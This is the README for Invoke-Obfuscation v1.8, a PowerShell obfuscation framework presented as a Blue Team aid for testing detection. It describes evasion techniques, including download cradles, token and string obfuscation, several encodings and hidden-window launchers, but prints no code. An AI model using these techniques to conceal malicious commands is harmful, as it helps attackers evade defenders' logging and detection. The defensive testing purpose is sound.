Invoke-Obfuscation v1.8

Introduction

Background

In the Fall of 2015 I decided to begin researching the flexibility of
PowerShell's language and began cataloguing the various ways to
accomplish a handful of common techniques that most attackers use on a
regular basis.

Initially focusing on encoded command and remote download cradle syntaxes,
I discovered that various escape characters that did not hinder the
execution of the command persisted in the command line arguments, both in
the running process as well as what is logged in Security EID 4688 and
Sysmon EID 1 event logs. This led me to systematically explore ways of
obfuscating each kind of "token" found in any PowerShell command or script.

I then explored more obscure ways to perform string-level obfuscation,
various encoding/encrypting techniques (like ASCII/hex/octal/binary and even
SecureString), and finally PowerShell launch techniques to abstract the
command line arguments from powershell.exe and to push it back to the parent
and even grandparent process.

Purpose

Attackers and commodity malware have started using extremely basic
obfuscation techniques to hide the majority of the command from the command
line arguments of powershell.exe. I developed this tool to aid the Blue Team
in simulating obfuscated commands based on what I currently know to be
syntactically possible in PowerShell 2.0-5.0 so that they can test their
detection capabilities of these techniques.

The tool's sole purpose is to break any assumptions that we as defenders may
have concerning how PowerShell commands can appear on the command line. My
hope is that it will encourage the Blue Team to shift to looking for
Indicators of Obfuscation on the command line in addition to updating
PowerShell logging to include Module, ScriptBlock and Transcription logging
as these sources simplify most aspects of the obfuscation techniques
generated by this tool.

Usage

While all of the layers of obfuscation have been built out into separate
scripts, most users will find the Invoke-Obfuscation function to be the
easiest way to explorer and visualize the obfuscation techniques that this
framework currently supports.

Installation

The source code for Invoke-Obfuscation is hosted at Github, and you may
download, fork and review it from this repository
(https://github.com/danielbohannon/Invoke-Obfuscation). Please report issues
or feature requests through Github's bug tracker associated with this project.

v1.4 - 2016-10-28 BruCON (Ghent, Belgium): Added new BXOR ENCODING function. Also enhanced
randomized case for all components of all ENCODING functions as well as for
PowerShell execution flags for all LAUNCHERs. Finally, added -EP shorthand option
for -ExecutionPolicy to all LAUNCHERs as well as the optional integer representation
of the -WindowStyle PowerShell execution flag: Normal (0), Hidden (1), Minimized (2),
Maximized (3).

Added base menu auto-detect functionality to avoid needing to use BACK or HOME:
E.g., if you ran TOKEN then ALL then 1, then just type LAUNCHER and you will get to
the LAUNCHER menu without needing to type HOME or BACK to get back to the home menu.